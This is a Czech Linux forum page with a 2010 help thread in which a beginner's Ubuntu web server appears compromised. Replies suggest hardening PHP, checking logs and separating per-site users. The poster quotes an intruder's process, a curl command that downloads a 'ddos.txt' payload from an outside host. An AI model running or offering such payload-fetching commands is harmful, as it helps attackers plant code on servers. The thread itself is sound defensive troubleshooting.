abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 19:44 | IT novinky

    Tribunál Soudního dvora Evropské unie dnes zamítl několik žalob, v nichž se americká společnost Apple ohrazovala proti pravidlům fungování velkých technologických společností na unijním trhu. Applu se nelíbilo, že jeho obchod s aplikacemi a operační systém iOS mají podléhat přísnějším povinnostem jen proto, že Brusel firmu považuje za takzvaného gatekeepera, tedy strážce přístupu.

    Ladislav Hagara | Komentářů: 0
    dnes 13:11 | IT novinky

    Na WhatsAppu budou postupně v průběhu následujících měsíců zavedena uživatelská jména. Telefonní čísla tak mohou zůstat soukromá. Aktuálně si lze uživatelské jméno rezervovat.

    Ladislav Hagara | Komentářů: 3
    dnes 11:11 | IT novinky

    Byl aktualizován TIOBE Index (Wikipedie). Programovací jazyk Rust se poprvé dostal do první desítky tohoto žebříčku popularity programovacích jazyků. Vede Python následovaný C, C++, Java, C#, …

    Ladislav Hagara | Komentářů: 0
    dnes 01:55 | Nová verze

    Proton (Wikipedie), tj. fork Wine integrovaný ve Steamu umožňující na Linuxu hrát hry určené pouze pro Windows, byl vydán ve verzi 11.0-1. Přehled novinek se seznamem nově podporovaných her na GitHubu. Aktuální přehled všech podporovaných her na stránkách ProtonDB

    Ladislav Hagara | Komentářů: 0
    včera 20:44 | Zajímavý software

    Byly publikovány zdrojové kódy počítačové hry Unturned. Pro nekomerční účely. V plánu je přelicencování pod MIT. Hra Unturned je postavena nad multiplatformním herním enginem Unity.

    Ladislav Hagara | Komentářů: 1
    včera 15:55 | IT novinky

    První česká družice navržená a sestavená výhradně studenty se dostala na oběžnou dráhu Země. Družice KOSTKA, kterou vyvinul studentský tým YSpace z Vysokého učení technického v Brně (VUT), dnes odstartovala na palubě rakety Falcon 9 společnosti SpaceX v rámci mise Transporter-17 z kalifornské základny Vandenberg Space Force Base.

    Ladislav Hagara | Komentářů: 0
    včera 05:00 | IT novinky

    Po nákresech ovladače Steam Controller a puku společnost Valve na svém GitLabu publikovala projekt Inkterface, tj. podrobný návod (PDF, video v mp4) na sestavení předního panelu s e-papírovým displejem pro Steam Machine pro zobrazování systémových informací. Použity jsou součástky od společnosti Adafruit.

    Ladislav Hagara | Komentářů: 2
    včera 04:00 | Bezpečnostní upozornění

    V jádře Linux byla nalezena a v dubnu letošního roku v upstreamu opravena kritická zranitelnost Bad Epoll aneb CVE-2026-46242. Jedná se o zranitelnost typu "race-condition use-after-free", která běžnému uživateli umožňuje získat práva roota. Na distribucích Linuxu i na Androidu. Dokonce i zevnitř sandboxu prohlížeče Chrome. Chyba byla do Linuxu zavedena v dubnu 2023, tj. Linux 6.4.

    Ladislav Hagara | Komentářů: 0
    6.7. 23:22 | Nová verze

    Byla vydána nová verze 10.4 sady aplikací pro SSH komunikaci OpenSSH. Přináší řadu důležitých bezpečnostních oprav, vylepšení funkcí a oprav chyb. Vyzkoušet lze experimentální podporu postkvantového algoritmu mldsa44-ed25519.

    Ladislav Hagara | Komentářů: 0
    6.7. 16:33 | Zajímavý projekt

    Open Printer je otevřená kompaktní tiskárna od Open Tools. Brzy by měla být spuštěna kampaň na její podporu na Crowd Supply. Současně by měly být uvolněny zdrojové kódy. Postavena je na Raspberry Pi Zero W a STM32. Používá inkoustové kazety HP 302.

    Ladislav Hagara | Komentářů: 3
    Které desktopové prostředí na Linuxu používáte?
     (10%)
     (8%)
     (2%)
     (17%)
     (31%)
     (4%)
     (6%)
     (2%)
     (16%)
     (25%)
    Celkem 2078 hlasů
     Komentářů: 30, poslední 3.4. 20:20
    Rozcestník


    Dotaz: DDOS?? (urgent)

    10.8.2010 01:31 Martin
    DDOS?? (urgent)
    Přečteno: 503×
    Čus chlapi. Jsem začátečník a mám vlastní webserver s ubuntu 9.10. Ted se mi však často stává že se systém přetíží natolik že se nezapne ani LCD. Občas se mi povede chytnout dobrou chvilku a vidim tam ty žrouty: (výpis z webmina) ID USER CPU PŘÍKAZ 9422 www-data 46.3 % /sbin/syslogd 9429 www-data 27.8 % /sbin/klogd -c 1 -x -x 9427 www-data 26.0 % /sbin/syslogd

    No a právě teď jsem tam na chvíli zachytl proces pod tímto příkazem: curl -O http://www.salsayson.com/logs/ddos.txt -O ddos.txt

    Spuštěné to bylo pod www-data. Můžete mi pomoci? Jakou ochranu nasadit na server? Už tam mám firewall, nastavený dokonce i s dhcp. Ale přesto to přes něj projde :( Opravdu jsem ještě neznalý...

    Díky moc

    Odpovědi

    Jendа avatar 10.8.2010 02:31 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Máš tam záškodníka. Ale běží pod www-data, tzn. asi se mu nepodařilo získat roota (to bys ho třeba ani neviděl). Tipnul bych si, že hostuješ nějakou děravou PHP aplikaci, která umožňuje cizím lidem spouštět externí programy (v tomto případě v Perlu).
    10.8.2010 04:14 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    běží tam wordpress, e107, phpbb, oxid eshop. Web s e107 již potíže byli. Dokonce jsem musel několikrát nahrazovat celý root adresář. Na serveru mi také občas mizí obrázky (ze všech cms). Většinou to bývají loga.
    10.8.2010 08:57 NN
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Mam napad pokud jiz nemas "suhosin" pro PHP..

    NN
    10.8.2010 09:10 none
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Pomerne bezna situace. Je potreba zjistit jakou dirou se tam dostava. Nic sloziteho to nebude, nejspis neco v php (obligatni 'include $file' apod. Hledej v logach souvisejicich s tim zaznamem co jsi posilal (podle ip adresy, nazvu souboru apod.). Pokud ten proces bezi, najdes ho v /proc a uvidis i odkud byl spusten. A kdyz uz vis jak to funguje, tak musis vhodne nastavit apache/php/system tak, aby k tomu nemohlo dojit. Opravovat skript php, ktery je takhle deravy je neproduktivni, protoze jich bude pravdepodobne deravych vic a je jen otazkou casu, kdy se to bude opakovat. Nadruhou stranu nechat tam tu diru je taky hrich. Takze jednak opravit php skripty a jednak nakonfiguraovat prostredi tak, aby k tomu nemohlo dochazet. V php zakazat vsechny potencialne nebezpecne funkce (exec, system etc.), kazdemu hostingu dat jineho uzivatele s prislusnymi pravy a tak dale. Neni to jednoduche a neni to neprustrelne, bohuzel. Ale drtivou vetsinu tech utoku eliminujes. Prinejmensim tech robotickych.

    Jojo, provozovat LAMP/LAPP (a vubec jakykoliv) server neni pro kazdeho, je treba neco umet a znat system ktery pouzivas. Pockej az prijdou ucty za datovy prenos, stiznosti na spam na utoky apod. Vyplati se tomu rozumnet nebo to nechat odbornikum ;). Za par stovek ti ten server muze nekdo spravovat a mas klid.
    10.8.2010 12:18 Šangala | skóre: 56 | blog: Dutá Vrba - Wally
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Většina byla již popsána, jen doplním, že před přetížením Vás mohou zachránit limity s vhodným nastavením. Potom se aspoň na ten server pravděpodobně lehce dostanete a může analyzovat a napravovat…
    To, že trpíš stihomamem, ještě neznamená, že po tobě nejdou. ⰞⰏⰉⰓⰀⰜⰉ ⰗⰞⰅⰜⰘ ⰈⰅⰏⰉ ⰒⰑⰎⰉⰁⰕⰅ ⰏⰉ ⰒⰓⰄⰅⰎ ·:⁖⁘⁙†
    11.8.2010 07:50 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Takže mam v ubuntu vytvořit klasickýho uživatele a pak tomu uživateli přidělit root adresář webu? V tý e107 jsem dělal nějaké úpravy, takže sem možná někde nechal chmod 777. To bude určitě ono že? :) Systému ještě moc nerozumim, hlavně struktuře souborů, oprávnění a jejich smysl :D
    11.8.2010 10:29 alkoholik | skóre: 40 | blog: Alkoholik
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    A co si o tom alespon neco malo precist?

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.